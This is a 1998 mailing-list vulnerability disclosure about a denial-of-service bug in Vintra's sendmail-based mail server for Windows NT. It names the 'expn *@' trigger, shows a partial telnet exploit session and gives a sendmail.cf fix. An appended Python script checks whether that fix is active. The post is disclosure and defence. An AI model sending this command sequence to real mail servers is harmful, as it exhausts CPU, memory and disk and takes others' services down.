From: Vytis Fedaravicius (vytis@OT.LT)
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Date: Mon, 20 Jul 1998 20:46:10 +0000
Subject: DOS in Vintra systems Mailserver software.

Hello,

There is a bug in a free MailServer software for Windows NT from Vintra
systems ( http://www.vintra.com/mailsrvr.html ). Any remote user can cause
the MTA to go nuts and make CPU usage go up to 99%, eat all available memory
and disk space.

Bug: one opens a telnet session to port 25, issues the helo, mail from: and
rcpt to: commands, and instead of the data command uses expn *@. The software
goes into an infinite loop.

Fix: disable the expn command by editing sendmail.cf. Add the following line
and restart the MTA service.

O PrivacyOptions=needmailhelo, noexpn

Exploit (commands to enter are marked ">")

>telnet vulnerable.server.dom 25

220 vulnerable.server.dom ESMTP Sendmail 8.8.8/8.8.7; Mon, 20 Jul 1998
20:18:20 +0200 (Central Europe Daylight Time)

>helo EvilOne

250 vulnerable.server.dom Hello Administrators@localhost, pleased to meet
you

>mail from:bad.boy

250 bad.boy... Sender ok

>rcpt to:resourceLeaker

550 resourceLeaker... User unknown

[snip...]

This software is sendmail based, so maybe other implementations are
vulnerable also? Vintra systems were notified.


Vytis Fedaravicius
System administrator
Omnitel

e-mail: vytis@ot.lt
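
A way to confirm the fix above is actually active in a given sendmail.cf, as an added example that is not part of the original post or of Vintra's software. The function names and the two sample configurations are constructed for illustration; the check assumes the long `O PrivacyOptions=` form shown in the post and treats flags from repeated lines as cumulative.

```python
import re
import sys

# Long-form option line in sendmail.cf: "O Name=value", with "O" in column 1.
_OPTION_RE = re.compile(r"^O\s+([A-Za-z]+)\s*=\s*(.*)$")

def privacy_flags(cf_text):
    """Collect PrivacyOptions flags from sendmail.cf text.

    Assumption: flags from repeated PrivacyOptions lines accumulate, so the
    union is returned. Commented-out lines are ignored.
    """
    flags = set()
    for line in cf_text.splitlines():
        m = _OPTION_RE.match(line.rstrip())
        if m and m.group(1).lower() == "privacyoptions":
            flags.update(f.lower() for f in re.split(r"[,\s]+", m.group(2)) if f)
    return flags

def expn_disabled(cf_text):
    """True only if noexpn is explicitly listed on an active line."""
    return "noexpn" in privacy_flags(cf_text)

# Constructed sample: the line from the post is present but commented out.
UNFIXED_CF = """\
# privacy settings
#O PrivacyOptions=needmailhelo, noexpn
O PrivacyOptions=authwarnings
"""

# Constructed sample: the line from the post is active.
FIXED_CF = """\
# privacy settings
O PrivacyOptions=needmailhelo, noexpn
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="latin-1") as fh:
            ok = expn_disabled(fh.read())
        print("EXPN disabled" if ok else "EXPN still enabled: add noexpn")
        sys.exit(0 if ok else 1)
    for name, text in (("unfixed", UNFIXED_CF), ("fixed", FIXED_CF)):
        print(name, sorted(privacy_flags(text)), expn_disabled(text))
```

Run with the path to sendmail.cf as the only argument; the exit status is non-zero when noexpn is missing, so the check can gate a restart script.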